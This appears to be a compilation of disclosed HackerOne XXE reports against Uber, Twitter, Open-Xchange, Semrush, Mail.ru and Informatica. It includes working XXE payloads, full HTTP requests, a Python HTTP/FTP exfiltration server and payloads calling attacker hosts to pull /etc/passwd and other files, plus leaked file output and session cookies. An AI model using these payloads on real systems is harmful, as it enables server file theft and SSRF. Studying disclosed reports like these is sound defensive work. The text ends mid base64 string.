Write-ups

Uber

Uber disclosed on HackerOne: Blind OOB XXE At...HackerOne

Researcher was able to get a backend server (a 3rd party server) to reach out to the attacker controlled server (122.180.248.81) to retrieve an XML external entity. This was a blind XXE, researcher was unable to extract sensitive info. Below demonstrates the PoC XXE SSRF.

The modified request with the XML Payload in the HTTP POST request body:

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 214
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://122.180.248.81/payload.dtd%22%3E
%dtd;]>
<GeneralSearch>&send;</GeneralSearch>

The web server logs show the backend server (8.36.86.68) reaching out to retrieve the XML External Entity:

Twitter

X / xAI disclosed on HackerOne: XXE on sms-be-vip.twitter.com in...HackerOne

Researcher discovered XXE vulnerability on a cloudhopper sxmp servlet on sms-be-vip.twitter.com domain. This XXE allowed local file retrieval and SSRF. The HTTP POST request on the /api/sxmp/1.0 path is vulnerable to XXE, the payload can be seen on lines 7-11:

POST /api/sxmp/1.0 HTTP/1.1
Host: sms-be-vip.twitter.com
Connection: close
Content-Type: text/xml
Content-Length: 481

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY file SYSTEM "file:///etc/passwd"> 
]>
<operation type="deliver">
<account username="abc" password="a"/>
<deliverRequest referenceId="MYREF102020022">
<operatorId>&file;</operatorId>
<sourceAddress type="network">40404</sourceAddress>
<destinationAddress type="international">123</destinationAddress>
<text encoding="ISO-8859-1">a</text>
</deliverRequest>
</operation>
</code>

HTTP Response contains the contents of the /etc/passwd file in an error message:

<?xml version="1.0"?>
<operation type="deliver">
  <error code="1010" message="Unable to convert [root:x:0:0:root:/root:/bin/bash...[truncated by researcher] to an integer for [operatorId]"/>
</operation>

Open-Xchange (Powerpoint parser XXE)

https://hackerone.com/reports/334488hackerone.com

Researcher discovered a powerpoint file parser on an Open-Xchange server that parses XML external entities. The researcher was able to extract web server files to an attacker controlled server.

The process is as follows:

Create powerpoint file. Use winrar to open newly created powerpoint file. Open the tableStyles.xml file which should look like this:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}"/>

Attach the payload in the second line of the tableStyles.xml file and save the file:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE a:tblStyleLst [<!ELEMENT a:tblStyleLst ANY ><!ENTITY % sp SYSTEM "http://54.227.205.198:443/">%sp;%param1;]>
<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}">&exfil;</a:tblStyleLst>

The python code runs on the attacker controlled server. Once it receives an HTTP request it returns the DTD which extracts the /etc/hostname file and exports it to the attacker controlled server via FTP. The DTD can be seen on line 12-13. Lines 19-26 emulate an HTTP server and serve the DTD. Lines 27-56 are the FTP server which waits for the connection from the victim server and reads the input.

#!/usr/env/python
# coding: utf-8

from __future__ import print_function
import socket


HOST = '54.227.205.198'
PORT = 443

# this DTD will be returned at first HTTP-request
dtd = '''<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://{}:{}/%data;'>">'''.format(HOST, PORT)

# Create socket and bins it to all interfaces and chosen port
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',PORT))
s.listen(1)
conn,addr = s.accept()  # await for incoming HTTP-connection
print('->  HTTP-connection accepted')

# Read request and send DTD, emulating the HTTP-server
data = conn.recv(1024)
conn.sendall('HTTP/1.1 200 OK\r\nContent-length: {len}\r\n\r\n{dtd}'.format(len=len(dtd), dtd=dtd))
print('->  DTD sent')
conn.close()
conn,addr = s.accept()  # await for incoming FTP-connection
print('->  FTP-connection accepted')

conn.sendall('220 FTP\r\n')  # emulate FTP-server

stop = False
while not stop:
  data = str(conn.recv(1024))  # read client commands
  
  # if the client sends USER, ask for password to emulate
  # FTP-authentication properly
  if data.startswith('USER'):
    conn.sendall('331 password please\r\n')

  # RETR command would contain the extracted data
  elif data.startswith('RETR'):
    print('->  RETR command received, extracted data:')
    print('-'*30)
    print(data.split(' ', 1)[-1])
    stop = True

  elif data.startswith('QUIT'):  # stop, it client asks
    stop = True

  # asks for more data otherwise
  else:
    conn.sendall('230 more data please\r\n')

conn.close()
s.close()

With the python code running on the attacker controlled server, the malicious powerpoint file is uploaded to the Open-Xchange server. This successfully forces the backend server to parse the powerpoint file processing the tableStyles.xml file therein, then issue an HTTP request to retrieve the DTD, process it and exfiltrate the /etc/hostname file via FTP to the attacker controlled server. The hostname extracted is shown below:

sandbox-1

This is a successful XXE Out-of-Band exploit to retrieve web server files to an attacker controlled server utilizing HTTP and FTP.

Phone call to XXE

https://hackerone.com/reports/395296hackerone.com

Quoting researcher cdl:

"VoiceXML (VXML) is a digital document standard for specifying interactive media and voice dialogs between humans and computers. It is used for developing audio and voice response applications"
When a user purchases a phone number through █████, they are given an option to forward inbound calls to an Interactive Voice Response (IVR) script (containing VoiceXML".
An attacker can create a VoiceXML file containing DTD's and the IVR system will process the entities.

Upload the following payload.VXML and lol.xml files to the attacker controlled web server web root:

payload.vxml

<?xml version='1.0' encoding='UTF-8' ?>
<!DOCTYPE foo [
<!ENTITY % b SYSTEM "file:///etc/passwd">
<!ENTITY % asd SYSTEM "http://example.com/lol.xml"> %asd; %rrr;]>
<vxml version="2.1">
<form>
<block>
<prompt>payload executed</prompt>
</block>
</form>
</vxml>

lol.xml

<!ENTITY % c "<!ENTITY &#37; rrr SYSTEM 'http://example,com:1337/%b;'>">%c;

Visit the website, click "edit" phone number. Click "Forward to VoiceXML" and insert your attacker controlled URL and script https://attacker.com/payload.vxml.

Start a netcat listener on attacker controlled web server and call the phone number.

The service will retrieve the payload.vxml file and output the contents of /etc/passwd to the attacker controlled web server on port 1337.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
logstash:x:498:499:logstash:/opt/logstash:/sbin/nologin
nagios:x:497:498::/var/spool/nagios:/sbin/nologin
nrpe:x:496:497:NRPE user for the NRPE service:/var/run/nrpe:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
unbound:x:495:496:Unbound DNS resolver:/etc/unbound:/sbin/nologin
consul:x:494:495:Hashicorp consul.io:/opt/consul:/bin/false

SemRush XXE OOB File read and File listing

Semrush disclosed on HackerOne: XXE in Site Audit function exposing...HackerOne

Quoting researcher ajxchapman:

The Site Audit function spiders a given website and performs analysis on the discovered pages. In order to improve website spidering the URL of a sitemap.xml file can be provided. If provided, the sitemap.xml file will be downloaded and processed by a Java XML processor.
The Java xml processor used is vulnerable to XXE attacks. By providing an external document type declaration (DTD) the XML processor can be coerced into processing external entities,

Malicious sitemap.xml containing XXE payload in lines 2-4 with the External Entity &xxe; within the <loc> value to make web server reach out for XML External Entity:

<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://xxe.webhooks.pw/text.txt" >]>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" 
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
    <url>
        <loc>&xxe;</loc>
        <lastmod>2006-11-18</lastmod>
        <changefreq>daily</changefreq>
        <priority>0.8</priority>
    </url>
</urlset>

Web server logs showing the XML parser retrieving the XML External Entity:

"███" - - [05/Feb/2018:13:12:26 +0000] "GET /text.txt HTTP/1.1" 302 - "-" "Java/1.8.0_144"

This vulnerability was further exploited to retrieve the directory listing of the /home path:

sitemap.xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE urlset [
 <!ENTITY % goodies SYSTEM "file:///home/">
 <!ENTITY % dtd SYSTEM "http://dtd.webhooks.pw/files/combine.dtd">
%dtd;
]>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" 
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
    <url>
        <loc>http://location.webhooks.pw/resp/&xxe;</loc>
        <lastmod>2006-11-18</lastmod>
        <changefreq>daily</changefreq>
        <priority>0.8</priority>
    </url>
</urlset>

combine.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY xxe "%goodies;">

Attacker web server logs showing the output of the /home directory listing:

"46.229.173.66" - - [05/Feb/2018:14:39:35 +0000] "GET /resp/██████ HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; SemrushBot-SA/0.97; +http://www.semrush.com/bot.html)"
---

Decoded:
██████████
█████
█████
cdh
█████████
██████
███████
█████
█████████
██████████
███
████████
lost found
███████
█████████
█████████

Mail.ru

https://hackerone.com/reports/12583hackerone.com

Researcher discovered XXE vulnerability in HTTP POST request in the sitelinks_xml body parameter.

Getting the server to query the attacker controlled server for XML external Entity with the payload:

<!DOCTYPE aaa SYSTEM "http://95.211.198.76:6666/xxe.xml%22%3E

POST /domain/metadata HTTP/1.1
Host: webmaster.mail.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://webmaster.mail.ru/domain/
Content-Length: 909
Cookie: p=fwoAANHmmQAA; mrcu=3BE3537A7E507ED9608843B61205; VID=0DDvyr1ZZvnD:; i=AQBZfnpTAQBdAAUCAQA=; b=UT8AADCX/QcAPgAAgh828AAA; s=fver=13; mc1=1400536667; Mpop=1400536671:7e796b525c546e5419050219081d000c1c0600054966535c465d020101000716037572164e505844545f54435444505e4d105d57515e1c4a4c:whitehataudit@mail.ru:; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAQAAACAAAEBvAcA; wmus=c9cac4666004e6dadcf235cff3a6a3669a418896
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

sitemap_urls=&fullname=fulltitle'%22%3E%3Ca%3EasdF%3C%2FA%3E&sitelinks-title=title'%22%3E%3Ca%3EasdF%3C%2FA%3E&sitelinks-url=%2Fasdfasdf&meta-adress-country=country'%22%3E%3Ca%3EasdF%3C%2FA%3E&meta-adress-region=region'%22%3E%3Ca%3EasdF%3C%2FA%3E&meta-adress-city=city'%22%3E%3Ca%3EasdF%3C%2FA%3E&meta-adress-adress=addr'%22%3E%3Ca%3EasdF%3C%2FA%3E&meta-adress-code-c=&meta-adress-code-r=&meta-adress-phone=&sitelinks_xml=<!DOCTYPE aaa SYSTEM "http://95.211.198.76:6666/xxe.xml%22%3E <site><name><![CDATA[fulltitle'"><a>asdF</A>]]></name><sitelinks><sitelink title="title" url="http://simple-semiconductors.com/asdfasdf" /></sitelinks><addresses><address><addressLocality>city%26foo%3b</addressLocality><addressCountry>country </addressCountry><addressRegion>region</addressRegion><streetAddress>addr</streetAddress></address></addresses></site>&id=481265&site_url=simple-semiconductors.com&sitemap_url_errors=-1

On attacker controlled server (95.211.198.76) the internal webmaster.mail.ru server (95.211.198.76) reaches out:

nc -vvv -l 6666
Connection from 217.69.133.45 port 6666 [tcp/ircu-2] accepted
GET /xxe.xml HTTP/1.0
Host: 95.211.198.76:6666
Accept-Encoding: gzip

The researcher then attempted to extract the /etc/passwd file.

Payload:

<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]>

HTTP POST Request:

POST /domain/metadata HTTP/1.1
Host: webmaster.mail.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://webmaster.mail.ru/domain/
Content-Length: 929
Cookie: p=fwoAANHmmQAA; mrcu=3BE3537A7E507ED9608843B61205; VID=0DDvyr1ZZvnD:; i=AQBZfnpTAQBdAAUCAQA=; b=UT8AADCX/QcAPgAAgh828AAA; s=fver=13; mc1=1400536667; Mpop=1400536671:7e796b525c546e5419050219081d000c1c0600054966535c465d020101000716037572164e505844545f54435444505e4d105d57515e1c4a4c:whitehataudit@mail.ru:; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAQAAACAAAEBvAcA; wmus=c9cac4666004e6dadcf235cff3a6a3669a418896
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

sitemap_urls=&fullname=fulltitle'%22%3E%3Ca%3EasdF%3C%2FA%3E&sitelinks-title=title'%22%3E%3Ca%3EasdF%3C%2FA%3E&sitelinks-url=%2Fasdfasdf&meta-adress-country=country'%22%3E%3Ca%3EasdF%3C%2FA%3E&meta-adress-region=region'%22%3E%3Ca%3EasdF%3C%2FA%3E&meta-adress-city=city'%22%3E%3Ca%3EasdF%3C%2FA%3E&meta-adress-adress=addr'%22%3E%3Ca%3EasdF%3C%2FA%3E&meta-adress-code-c=&meta-adress-code-r=&meta-adress-phone=&sitelinks_xml=<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> <site><name><![CDATA[fulltitle'"><a>asdF</A>]]></name><sitelinks><sitelink title="title" url="http://simple-semiconductors.com/asdfasdf" /></sitelinks><addresses><address><addressLocality>city%26foo%3b</addressLocality><addressCountry>country </addressCountry><addressRegion>region</addressRegion><streetAddress>addr</streetAddress></address></addresses></site>&id=481265&site_url=simple-semiconductors.com&sitemap_url_errors=-1

The HTTP Response contains a partial part of the /etc/passwd file in an error message:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 20 May 2014 01:00:28 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 129
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: wmus=c9cac4666004e6dadcf235cff3a6a3669a418896; path=/; expires=Sat, 19-Jul-2014 01:00:28 GMT; HttpOnly

{"xml_error":true,"error":"Element 'addressLocality': [facet 'pattern'] The value 'root:x:0:0:root:/root:/bin/bash","line":1}

Researcher modified payload to extract full first line of /etc/passwd:

<!DOCTYPE site [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "/etc/passwd" > ]>

HTTP response:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 20 May 2014 02:24:31 GMT
Content-Type: application/json; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: wmus=c9cac4666004e6dadcf235cff3a6a3669a418896; path=/; expires=Sat, 19-Jul-2014 02:24:31 GMT; HttpOnly
Content-Length: 2454

{"xml":"<?xml version="1.0" encoding="utf8"?>
<!DOCTYPE site [
<!ELEMENT foo ANY>
<!ENTITY foo SYSTEM "/etc/passwd">
]>
<site url="simple-semiconductors.com" modified="1400552671">
<name><![CDATA[fulltitle'"><a>asdF</A>]]></name><sitelinks><sitelink title="title" url="http://simple-semiconductors.com/asdfasdf">root:x:0:0:root:/root:/bin/bash
███████</sitelink></sitelinks><addresses><address><addressLocality>x</addressLocality><addressCountry>country </addressCountry><addressRegion>region</addressRegion><streetAddress>addr</streetAddress></address></addresses></site>
"}

Mail.ru (2)

https://hackerone.com/reports/315837hackerone.com

Another XXE on Mail.ru domain where the researcher illustrated blind XXE with the ability to detect files on the server by the success of the XXE SSRF reaching out to the attacker controlled server (no XXE SSRF occurs if the file does not exist).

XML Payload:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
        <!ELEMENT foo ANY>
        <!ENTITY localfile SYSTEM "file:///sys/power/image_size">
        <!ENTITY remotedoc SYSTEM "http://obmhld.com/pocs/?token=xmlsdfgdg5454g54&doc1=2">
]>
<foo>&localfile;&remotedoc;</foo>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <Protocol>
        <Type>SMTP</Type>
        <Server>52.34.103.214</Server>
        <Port>1191</Port>
        <DomainRequired>off</DomainRequired>
        <LoginName>account@obmhld.com</LoginName>
        <DomainName>yandex.ru</DomainName>
        <SPA>off</SPA>
        <SSL>off</SSL>
        <AuthRequired>off</AuthRequired>
      </Protocol>
    </Account>
  </Response>
</Autodiscover>

Multiple requests follow the upload of the file from the Mail.ru backend server to the attacker controlled server.

5.61.237.44 - - [14/Feb/2018:01:05:14 +0000] "GET /autodiscover/autodiscover.xml HTTP/1.0" 200 955 "http://obmhld.com/autodiscover/autodiscover.xml" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Tablet PC 2.0; Microsoft Outlook 15.0.4481; ms-office; MSOffice 15)"

5.61.237.44 - - [14/Feb/2018:01:05:15 +0000] "GET /pocs/?token=xmlsdfgdg5454g54&doc1=2 HTTP/1.0" 200 10 "-" "-"

Informatica - XXE via XMP metadata in JPEG file

Informatica disclosed on HackerOne: XXE through injection of a...HackerOne

Researcher found that a HTTP POST route /edit-profile-avatar!uploadImage.jspa for uploading user profile avatars was vulnerable to XXE. The backend server processes the JPEG image and parses the XMP Metadata which is vulnerable to XXE.

The image below contains part of the JPEG file data with the XMP Metadata containing the payload:

Web server logs:

GET /x.dtd HTTP/1.1 
Cache-Control: no-cache 
Pragma: no-cache 
User-Agent: Java██████ 
Host: N.syuj65rfsb27o1u78jcinsinnet6ky8n.burpcollaborator.net 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive

The researcher further exploited this to retrieve the web server /etc/passwd file Out-of-Band via FTP. Unfortunately the payload used in the image is not included in the report.

Attacker controlled FTP Server retrieving the /etc/passwd file from the vulnerable Informatica web server:

XXE-FTP listening 
Connected by %s ('█████████', 32231)
USER anonymous

PASS Java█████

TYPE I

/root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
█████████
ntp:x:38:38::/etc/ntp:/sbin/nologin
██████████
█████████
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
██████
systemd-bus-proxy:x:500:221:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
nrpe:x:499:220:NRPE user for the NRPE service:/var/run/nrpe:/sbin/nologin
█████████
██████████

EPSV

EPRT |1|█████████|65407|

RETR nologin

Informatica

HTTP POST request SAMLResponse body parameter vulnerable to XXE. Researcher inserted the payload into the base64 encoded body parameter.

Payload:

<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "http://evilhost"> %asd;]>

HTTP POST Request:

POST /sso HTTP/1.1
Host: rev-app.informatica.com
Connection: keep-alive
Content-Length: 8669
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://infapassport.okta.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://infapassport.okta.com/app/template_saml/kwtbgh4jLAZPMXLQUNMU/sso/saml
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4

SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgZm9vIFsgPCFFTlRJVFkgJSBhc2QgU1lTVEVNICJodHRwOi8vZXZpbGhvc3QiPiAlYXNkO10%2BPHNhbWwycDpSZXNwb25zZSB4bWxuczpzYW1sMnA9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpwcm90b2NvbCIgRGVzdGluYXRpb249Imh0dHBzOi8vcmV2LWFwcC5pbmZvcm1hdGljYS5jb20vc3NvIiBJRD0iaWQyOTA5ODg2NzYyNzM5OTM1NDEyMDk2MjY1NSIgSXNzdWVJbnN0YW50PSIyMDE1LTEyLTI1VDEyOjQ4OjMwLjY3MloiIFZlcnNpb249IjIuMCIgeG1sbnM6eHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIj48c2FtbDI6SXNzdWVyIHhtbG5zOnNhbWwyPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIiBGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpuYW1laWQtZm9ybWF0OmVudGl0eSI%2BaHR0cDovL3d3dy5va3RhLmNvbS9rd3RiZ2g0akxBWlBNWExRVU5NVTwvc2FtbDI6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPjxkczpSZWZlcmVuY2UgVVJJPSIjaWQyOTA5ODg2NzYyNzM5OTM1NDEyMDk2MjY1NSI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyI%2BPGVjOkluY2x1c2l2ZU5hbWVzcGFjZXMgeG1sbnM6ZWM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIgUHJlZml4TGlzdD0ieHMiLz48L2RzOlRyYW5zZm9ybT48L2RzOlRyYW5zZm9ybXM%2BPGRzOkRpZ2VzdE1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNzaGExIi8%2BPGRzOkRpZ2VzdFZhbHVlPm9aV0EzYUVwRTdXeXhUUjdiRFllNDFieGVXaz08L2RzOkRpZ2VzdFZhbHVlPjwvZHM6UmVmZXJlbmNlPjwvZHM6U2lnbmVkSW5mbz48ZHM6U2lnbmF0dXJlVmFsdWU%2BZ0hwc0Z1aURmSE9ZOTkzY0IrVkRvdlQxNDg3T1U1Y1ZmTmxldlN3VXFiK3I5UTJGR00xWDFFczJNT2x1MXBudXQzU3V4dGNzcXU3OWdqb0ZvVW9RdGFnNllFNjhEdGtwR1d5S2RYUW1sZU9ZM0lkQ21NcGk4cFhXdnZJTnV2WDBiZHp6V1ZXTVlqTXplbDdPTFBXL0FZMDdETGl5ellkT0dYTmtKemlZcVZRPTwvZHM6U2lnbmF0dXJlVmFsdWU%2BPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJQ296Q0NBZ3lnQXdJQkFnSUdBVDN3UmxIdE1BMEdDU3FHU0liM0RRRUJCUVVBTUlHVU1Rc3dDUVlEVlFRR0V3SlZVekVUTUJFRwpBMVVFQ0F3S1EyRnNhV1p2Y201cFlURVdNQlFHQTFVRUJ3d05VMkZ1SUVaeVlXNWphWE5qYnpFTk1Bc0dBMVVFQ2d3RVQydDBZVEVVCk1CSUdBMVVFQ3d3TFUxTlBVSEp2ZG1sa1pYSXhGVEFUQmdOVkJBTU1ER2x1Wm1Gd1lYTnpjRzl5ZERFY01Cb0dDU3FHU0liM0RRRUoKQVJZTmFXNW1iMEJ2YTNSaExtTnZiVEFlRncweE16QTBNRGt4T1RJNE16TmFGdzAwTXpBME1Ea3hPVEk1TXpOYU1JR1VNUXN3Q1FZRApWUVFHRXdKVlV6RVRNQkVHQTFVRUNBd0tRMkZzYVdadmNtNXBZVEVXTUJRR0ExVUVCd3dOVTJGdUlFWnlZVzVqYVhOamJ6RU5NQXNHCkExVUVDZ3dFVDJ0MFlURVVNQklHQTFVRUN3d0xVMU5QVUhKdmRtbGtaWEl4RlRBVEJnTlZCQU1NREdsdVptRndZWE56Y0c5eWRERWMKTUJvR0NTcUdTSWIzRFFFSkFSWU5hVzVtYjBCdmEzUmhMbU52YlRDQm56QU5CZ2txaGtpRzl3MEJBUUVGQUFPQmpRQXdnWWtDZ1lFQQprOFUyUnY1S2lmMzE2aVFkRWVaU25JY3d4amNNRDkzcUpRL1BQbkJDc1A4MDFkbThEOGxxbHBmcHg0Mk82SkxwR0pycSt6UExhZURiCmo1TFJqak9GQjFWR3Z4dEM2eGlpY3o2SXZTS1FVQXFxOCtpL2hsU293SU5zdS9TOWswd0hDaEplVi9tYnBMbVRWeXRRSlYrdVNRM1QKemdjcTNWQzU5VXR2djNFNUJ4OENBd0VBQVRBTkJna3Foa2lHOXcwQkFRVUZBQU9CZ1FBKzBITi9sSkduTWd4SWVwVGJ4LzZqYjNhWQpPNWpyK3IraWFvL1BwL1dlNkxTL2t5MkovdkpGSnZ5TjNMcjBKcFVaeW4zQUZUc3Y4ZFNURmxjeTN2blZBUjdkdnhaY1dHTGlwbzRECm5ZQ3NGNmYvcFgwRDFHSmgyaUZxL3ArK0dqbldIRzZ0Z3ZkUm93akdqVkM3MTFrTy9rUHJIa1ZleDFTNGhlUkxCUVM2Mnc9PTwvZHM6W